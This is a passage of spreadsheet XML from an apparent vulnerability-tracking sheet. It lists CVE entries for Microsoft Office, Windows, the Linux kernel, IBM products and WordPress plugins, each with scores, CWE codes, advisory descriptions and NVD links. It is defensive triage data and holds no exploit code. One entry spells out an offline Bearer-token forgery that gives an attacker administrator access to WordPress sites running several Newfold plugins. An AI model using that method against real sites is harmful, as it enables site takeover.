        </is>
      </c>
      <c r="L1003" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="C1004" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1004" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1004" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1004" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="C1005" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1005" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1005" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="I1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1005" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="C1006" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1006" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1006" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1006" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="C1007" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1007" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1007" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1007" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="C1008" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1008" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H100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08" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1008" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80099</t>
        </is>
      </c>
      <c r="C1009" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="inlineStr"/>
      <c r="I1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1009" s="5" t="inlineStr">
        <is>
          <t>Several Newfold plugins are vulnerable to Authentication Bypass. The vulnerability exists because the plugins bundle the wp-module-data module. In the module, the `authenticate()` method — registered on the `rest_authentication_errors` filter and therefore evaluated for every unauthenticated REST API request — performs an HMAC-style Bearer token comparison that degenerates when `HiiveConnection::get_auth_token()` returns `false`: PHP coerces `strrev(false)` to `strrev('')`, collapsing the secret salt to the publicly known constant `hash('sha256', '') = e3b0c44...`, while all remaining hash inputs (HTTP method, request URL, raw request body, and the `X-Timestamp` header) remain fully attacker-controlled. This makes it possible for unauthenticated attackers to compute a valid Bearer token entirely offline, pass the token equality check, and have `wp_set_current_user()` invoked against the first administrator returned by `get_users(['role' =&gt; 'administrator'])`, granting full administrator-level access and enabling arbitrary REST API operations such as creating new administrator accounts and achieving complete site takeover. Vulnerable versions are WP Plugin Crazy Domains (&lt;= 2.5.2), WP Plugin Web (&lt;= 2.3.4), WP Plugin Hostgator (&lt;= 3.1.0), WP Plugin Bluehost (&lt;= 4.17.1). The affected module is vulnerable in versions up to, and including, 2.9.4.</t>
        </is>
      </c>
      <c r="M1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80099</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80130</t>
        </is>
      </c>
      <c r="C1010" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L1010" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80130</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80465</t>
        </is>
      </c>
      <c r="C1011" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="inlineStr"/>
      <c r="I1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1011" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Mendix SAML (Mendix 10 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 11 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 9.24 compatible) (All versions &lt; V3.6.27). Affected versions of the module do not properly validate the SAML response signature. This could allow unauthenticated remote attackers to hijack an account (session) in specific SSO configurations.</t>
        </is>
      </c>
      <c r="M1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80465</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80914</t>
        </is>
      </c>
      <c r="C1012" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1012" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1012" s="5" t="inlineStr"/>
      <c r="I1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: ISO: fix use-after-free of listener socket in iso_conn_ready
iso_conn_ready() looks up the BIS listener socket with iso_get_sock(),
which takes a reference, and then, without re-checking its state,
creates a child socket from it:
    parent = iso_get_sock(hdev, ...);
    if (!parent)
        return;
    lock_sock(parent);
    sk = iso_sock_alloc(sock_net(parent), NULL, BTPROTO_ISO, ...);
    ...
    iso_chan_add(conn, sk, parent);
    ...
    release_sock(parent);
    sock_put(parent);
If the listener socket is closed concurrently, between iso_get_sock()
and lock_sock(), the reference taken by iso_get_sock() may be the last
one: the close path drops the link-list reference, and once
iso_conn_ready() drops its own reference at the end of the function the
socket is freed.  The child socket, however, is already linked to the
freed parent, and a later disconnect of the child runs iso_chan_del()
-&gt; bt_accept_unlink(), which dereferences the dangling parent pointer
into the freed accept queue (a use-after-free).  The same dangling
pointer is also dereferenced through parent-&gt;***() in
iso_chan_del().
Fix it the same way the connected (non-BIS) path was fixed in commit
0d255e63fcf3 ("Bluetooth: ISO: hold sk properly in iso_conn_ready"):
after taking the socket lock, re-check that the parent is still a
listening, alive socket, and bail out otherwise.</t>
        </is>
      </c>
      <c r="M1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80914</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80921</t>
        </is>
      </c>
      <c r="C1013" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1013" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1013" s="5" t="inlineStr"/>
      <c r="I1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: vsie: zero stale crypto bits
When shadowing crypto access bits from a format0 apcb (crycb 0 or 1),
the bits 64..255 are unchanged from whatever is in the vsie page in the
crycb and thus in the apcb. This gives a nested guest potential access
to a device no longer available. Zero out the remaining bits.</t>
        </is>
      </c>
      <c r="M1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80921</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81211</t>
        </is>
      </c>
      <c r="C1014" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="inlineStr"/>
      <c r="G1014" s="5" t="inlineStr">
        <is>
          <t>ibm, python</t>
        </is>
      </c>
      <c r="H1014" s="5" t="inlineStr"/>
      <c r="I1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1014" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary Python code due to improper authorization of custom components in stored flows.</t>
        </is>
      </c>
      <c r="M1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81211</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="C1015" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1015" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1015" s="5" t="inlineStr"/>
      <c r="I1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1015" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="C1016" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1016" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1016" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81543</t>
        </is>
      </c>
      <c r="C1017" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="inlineStr"/>
      <c r="I1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1017" s="5" t="inlineStr">
        <is>
          <t>The Abandoned Cart Pro for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 10.7.1. This is due to missing capability checks and nonce verification on multiple AJAX actions including wcap_save_connector_settings, wcap_send_manual_email, wcap_abandoned_cart_info, and wcap_change_manual_email_data. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify SMTP connector settings to route administrator recovery emails through an attacker-controlled server and intercept auto-login links to gain full administrative access. The plugin's auto-login feature must be enabled, which is the default configuration.</t>
        </is>
      </c>
      <c r="M1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81543</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81550</t>
        </is>
      </c>
      <c r="C1018" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="inlineStr"/>
      <c r="G1018" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1018" s="5" t="inlineStr"/>
      <c r="I1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81550</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81551</t>
        </is>
      </c>
      <c r="C1019" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="inlineStr"/>
      <c r="G1019" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1019" s="5" t="inlineStr"/>
      <c r="I1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to arbitrarily write to or delete files on shared storage due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81551</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81554</t>
        </is>
      </c>
      <c r="C1020" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="inlineStr"/>
      <c r="G1020" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1020" s="5" t="inlineStr"/>
      <c r="I1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1020" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81554</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81940</t>
        </is>
      </c>
      <c r="C1021" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="inlineStr"/>
      <c r="G1021" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1021" s="5" t="inlineStr"/>
      <c r="I1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1021" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special characters in flow display names.</t>
        </is>
      </c>
      <c r="M1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81940</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81941</t>
        </is>
      </c>
      <c r="C1022" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="inlineStr"/>
      <c r="G1022" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1022" s="5" t="inlineStr"/>
      <c r="I1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1022"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M1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81941</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="C1023" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1023" s="5" t="inlineStr"/>
      <c r="F1023" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1023" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1023" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1023" s="5" t="inlineStr"/>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81955</t>
        </is>
      </c>
      <c r="C1024" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1024" s="5" t="inlineStr"/>
      <c r="F1024" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1024" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1024" s="5" t="inlineStr"/>
      <c r="I1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1024" s="5" t="inlineStr"/>
      <c r="K1024" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1024" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1024" s="6" t="inlineStr">
        <is>
